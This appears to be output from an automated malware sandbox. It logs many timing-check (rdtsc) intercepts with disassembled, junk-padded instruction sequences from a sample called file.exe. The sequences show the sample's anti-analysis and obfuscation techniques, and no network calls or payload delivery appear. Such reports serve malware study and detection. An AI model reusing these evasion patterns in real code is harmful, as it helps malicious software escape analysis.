Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D806F0 second address: 4D80722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov di, 01E0h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+64h] 0x0000000e jmp 00007FC134D1C04Fh 0x00000013 mov dword ptr [esi+28h], eax 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 call 00007FC134D1C04Bh 0x0000001e pop ecx 0x0000001f mov ecx, edx 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80722 second address: 4D807EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC1350240D0h 0x00000009 jmp 00007FC1350240D5h 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov eax, dword ptr [ebx+68h] 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007FC1350240D3h 0x0000001c xor cl, 0000007Eh 0x0000001f jmp 00007FC1350240D9h 0x00000024 popfd 0x00000025 mov ah, 61h 0x00000027 popad 0x00000028 mov dword ptr [esi+2Ch], eax 0x0000002b pushad 0x0000002c call 00007FC1350240D9h 0x00000031 mov cx, 4FA7h 0x00000035 pop esi 0x00000036 pushfd 0x00000037 jmp 00007FC1350240CDh 0x0000003c xor cx, AF16h 0x00000041 jmp 00007FC1350240D1h 0x00000046 popfd 0x00000047 popad 0x00000048 mov ax, word ptr [ebx+6Ch] 0x0000004c jmp 00007FC1350240CEh 0x00000051 mov word ptr [esi+30h], ax 0x00000055 push eax 0x00000056 push edx 0x00000057 pushad 0x00000058 mov ebx, 6A089950h 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D807EF second address: 4D807F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D807F4 second address: 4D80840 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240D4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [ebx+00000088h] 0x00000010 jmp 00007FC1350240D0h 0x00000015 mov word ptr [esi+32h], ax 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FC1350240D7h 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80840 second address: 4D80846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80846 second address: 4D8084A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8084A second address: 4D80904 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C04Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebx+0000008Ch] 0x00000011 jmp 00007FC134D1C056h 0x00000016 mov dword ptr [esi+34h], eax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007FC134D1C04Eh 0x00000020 jmp 00007FC134D1C055h 0x00000025 popfd 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FC134D1C04Eh 0x0000002d and esi, 4C67DF18h 0x00000033 jmp 00007FC134D1C04Bh 0x00000038 popfd 0x00000039 pushfd 0x0000003a jmp 00007FC134D1C058h 0x0000003f add esi, 2040C978h 0x00000045 jmp 00007FC134D1C04Bh 0x0000004a popfd 0x0000004b popad 0x0000004c popad 0x0000004d mov eax, dword ptr [ebx+18h] 0x00000050 pushad 0x00000051 mov dx, si 0x00000054 push ecx 0x00000055 mov bl, 57h 0x00000057 pop esi 0x00000058 popad 0x00000059 mov dword ptr [esi+38h], eax 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80904 second address: 4D8090A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8090A second address: 4D80926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 mov ebx, 515E7308h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [ebx+1Ch] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC134D1C04Ah 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80926 second address: 4D8093E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+3Ch], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov esi, ebx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8093E second address: 4D809A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C053h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+20h] 0x0000000c jmp 00007FC134D1C056h 0x00000011 mov dword ptr [esi+40h], eax 0x00000014 jmp 00007FC134D1C050h 0x00000019 lea eax, dword ptr [ebx+00000080h] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FC134D1C057h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D809A0 second address: 4D809B6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov ecx, 68513407h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push 00000001h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D809B6 second address: 4D809BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D809BA second address: 4D809C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D809C0 second address: 4D80A42 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C04Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007FC134D1C050h 0x0000000f push eax 0x00000010 pushad 0x00000011 mov ebx, 31A897C4h 0x00000016 jmp 00007FC134D1C04Dh 0x0000001b popad 0x0000001c nop 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FC134D1C053h 0x00000026 sub esi, 1B74838Eh 0x0000002c jmp 00007FC134D1C059h 0x00000031 popfd 0x00000032 call 00007FC134D1C050h 0x00000037 pop eax 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80A42 second address: 4D80A48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80A48 second address: 4D80A4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80A4C second address: 4D80A6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC1350240D5h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80B25 second address: 4D80B3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 02h 0x00000005 mov ecx, 12C16EC7h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov edi, eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 mov dx, EF78h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80B3E second address: 4D80B94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test edi, edi 0x0000000b jmp 00007FC1350240D0h 0x00000010 js 00007FC1A64E2C27h 0x00000016 jmp 00007FC1350240D0h 0x0000001b mov eax, dword ptr [ebp-0Ch] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FC1350240D7h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80B94 second address: 4D80C44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 3012FC5Ah 0x00000008 mov ecx, edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+04h], eax 0x00000010 pushad 0x00000011 mov al, bh 0x00000013 pushfd 0x00000014 jmp 00007FC134D1C054h 0x00000019 or cx, 0DC8h 0x0000001e jmp 00007FC134D1C04Bh 0x00000023 popfd 0x00000024 popad 0x00000025 lea eax, dword ptr [ebx+78h] 0x00000028 jmp 00007FC134D1C056h 0x0000002d push 00000001h 0x0000002f jmp 00007FC134D1C050h 0x00000034 nop 0x00000035 jmp 00007FC134D1C050h 0x0000003a push eax 0x0000003b jmp 00007FC134D1C04Bh 0x00000040 nop 0x00000041 pushad 0x00000042 movzx eax, bx 0x00000045 call 00007FC134D1C051h 0x0000004a mov di, cx 0x0000004d pop esi 0x0000004e popad 0x0000004f lea eax, dword ptr [ebp-08h] 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 call 00007FC134D1C04Bh 0x0000005a pop esi 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80C44 second address: 4D80CA4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240D6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b movzx eax, dx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FC1350240D9h 0x00000015 or esi, 004CDB16h 0x0000001b jmp 00007FC1350240D1h 0x00000020 popfd 0x00000021 mov eax, 692D6987h 0x00000026 popad 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80CA4 second address: 4D80CA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80CA8 second address: 4D80CAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80E25 second address: 4D80E3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C04Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80E8D second address: 4D80EAA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80EAA second address: 4D80F33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C051h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FC1A61DA836h 0x0000000f jmp 00007FC134D1C04Eh 0x00000014 mov eax, dword ptr [ebp-14h] 0x00000017 pushad 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007FC134D1C04Ch 0x0000001f adc esi, 760242D8h 0x00000025 jmp 00007FC134D1C04Bh 0x0000002a popfd 0x0000002b jmp 00007FC134D1C058h 0x00000030 popad 0x00000031 jmp 00007FC134D1C052h 0x00000036 popad 0x00000037 mov ecx, esi 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FC134D1C04Ah 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80F33 second address: 4D80F37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80F37 second address: 4D80F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80F3D second address: 4D80F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D80F43 second address: 4D80F58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+0Ch], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov cx, bx 0x00000011 movsx edx, ax 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81089 second address: 4D8108F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8108F second address: 4D810B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 7F599D41h 0x00000008 mov ax, CC7Dh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [esi+04h] 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC134D1C052h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D810B7 second address: 4D810BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D810BD second address: 4D810ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C04Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+04h], eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ebx 0x0000000f call 00007FC134D1C056h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D810ED second address: 4D8110F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [esi+08h] 0x00000009 pushad 0x0000000a pushad 0x0000000b mov cx, bx 0x0000000e push ebx 0x0000000f pop eax 0x00000010 popad 0x00000011 mov edi, 30593F06h 0x00000016 popad 0x00000017 mov dword ptr [edx+08h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d push eax 0x0000001e pop edx 0x0000001f push ecx 0x00000020 pop edi 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8110F second address: 4D8117D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC134D1C04Dh 0x00000009 adc si, B866h 0x0000000e jmp 00007FC134D1C051h 0x00000013 popfd 0x00000014 movzx esi, di 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov eax, dword ptr [esi+0Ch] 0x0000001d jmp 00007FC134D1C053h 0x00000022 mov dword ptr [edx+0Ch], eax 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 pushfd 0x00000029 jmp 00007FC134D1C052h 0x0000002e sbb cx, DA68h 0x00000033 jmp 00007FC134D1C04Bh 0x00000038 popfd 0x00000039 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8117D second address: 4D811A2 instructions: 0x00000000 rdtsc 0x00000002 mov ah, E8h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movsx edi, ax 0x00000009 popad 0x0000000a mov eax, dword ptr [esi+10h] 0x0000000d jmp 00007FC1350240CCh 0x00000012 mov dword ptr [edx+10h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 movsx ebx, ax 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D811A2 second address: 4D8123F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 mov dl, 74h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esi+14h] 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007FC134D1C054h 0x00000014 or cx, B258h 0x00000019 jmp 00007FC134D1C04Bh 0x0000001e popfd 0x0000001f popad 0x00000020 mov dword ptr [edx+14h], eax 0x00000023 pushad 0x00000024 mov bh, E7h 0x00000026 jmp 00007FC134D1C04Ch 0x0000002b popad 0x0000002c mov eax, dword ptr [esi+18h] 0x0000002f jmp 00007FC134D1C050h 0x00000034 mov dword ptr [edx+18h], eax 0x00000037 jmp 00007FC134D1C050h 0x0000003c mov eax, dword ptr [esi+1Ch] 0x0000003f jmp 00007FC134D1C050h 0x00000044 mov dword ptr [edx+1Ch], eax 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FC134D1C057h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8123F second address: 4D81262 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 61FC479Ah 0x00000008 mov ecx, edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esi+20h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FC1350240CFh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81262 second address: 4D81268 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81268 second address: 4D8126D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D8136D second address: 4D81371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81371 second address: 4D81380 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81380 second address: 4D813AE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 664Ah 0x00000007 call 00007FC134D1C04Bh 0x0000000c pop ecx 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov ax, word ptr [esi+32h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FC134D1C052h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D813AE second address: 4D813B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D813B4 second address: 4D813B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D813B8 second address: 4D81411 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+32h], ax 0x0000000c jmp 00007FC1350240D9h 0x00000011 mov eax, dword ptr [esi+34h] 0x00000014 jmp 00007FC1350240CEh 0x00000019 mov dword ptr [edx+34h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FC1350240CDh 0x00000025 jmp 00007FC1350240CBh 0x0000002a popfd 0x0000002b mov ah, 97h 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81411 second address: 4D81416 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81416 second address: 4D814AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, al 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test ecx, 00000700h 0x0000000f pushad 0x00000010 push ebx 0x00000011 mov edi, ecx 0x00000013 pop ecx 0x00000014 pushfd 0x00000015 jmp 00007FC1350240D7h 0x0000001a and cx, 6F1Eh 0x0000001f jmp 00007FC1350240D9h 0x00000024 popfd 0x00000025 popad 0x00000026 jne 00007FC1A64E237Bh 0x0000002c pushad 0x0000002d mov dx, ax 0x00000030 popad 0x00000031 or dword ptr [edx+38h], FFFFFFFFh 0x00000035 pushad 0x00000036 push eax 0x00000037 movsx edi, cx 0x0000003a pop eax 0x0000003b mov di, 565Ch 0x0000003f popad 0x00000040 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000044 pushad 0x00000045 push edi 0x00000046 jmp 00007FC1350240CCh 0x0000004b pop esi 0x0000004c mov bh, D6h 0x0000004e popad 0x0000004f or dword ptr [edx+40h], FFFFFFFFh 0x00000053 pushad 0x00000054 mov esi, 51E43EAFh 0x00000059 push esi 0x0000005a jmp 00007FC1350240CBh 0x0000005f pop eax 0x00000060 popad 0x00000061 pop esi 0x00000062 pushad 0x00000063 pushad 0x00000064 push eax 0x00000065 push edx 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50DA3 second address: 4D50DA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50DA7 second address: 4D50DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50DAD second address: 4D50DF0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C054h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d mov edi, esi 0x0000000f call 00007FC134D1C04Ah 0x00000014 mov dx, ax 0x00000017 pop eax 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b jmp 00007FC134D1C04Dh 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D50DF0 second address: 4D50DF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D603F9 second address: 4D60409 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC134D1C04Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60409 second address: 4D60482 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007FC1350240CCh 0x0000000f mov ax, EC71h 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 jmp 00007FC1350240CCh 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d jmp 00007FC1350240CEh 0x00000022 pushfd 0x00000023 jmp 00007FC1350240D2h 0x00000028 sbb ecx, 4F1C8BA8h 0x0000002e jmp 00007FC1350240CBh 0x00000033 popfd 0x00000034 popad 0x00000035 push dword ptr [ebp+04h] 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FC1350240D5h 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60482 second address: 4D60488 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D60488 second address: 4D6048C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D6048C second address: 4D60490 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81876 second address: 4D81884 instructions: 0x00000000 rdtsc 0x00000002 mov edx, eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81884 second address: 4D81888 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81888 second address: 4D81897 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC1350240CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D81897 second address: 4D818DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC134D1C059h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FC134D1C057h 0x00000010 mov bh, al 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 movzx esi, bx 0x0000001a push edx 0x0000001b pop ecx 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D818DA second address: 4D818EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC1350240D1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4D818EF second address: 4D818F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
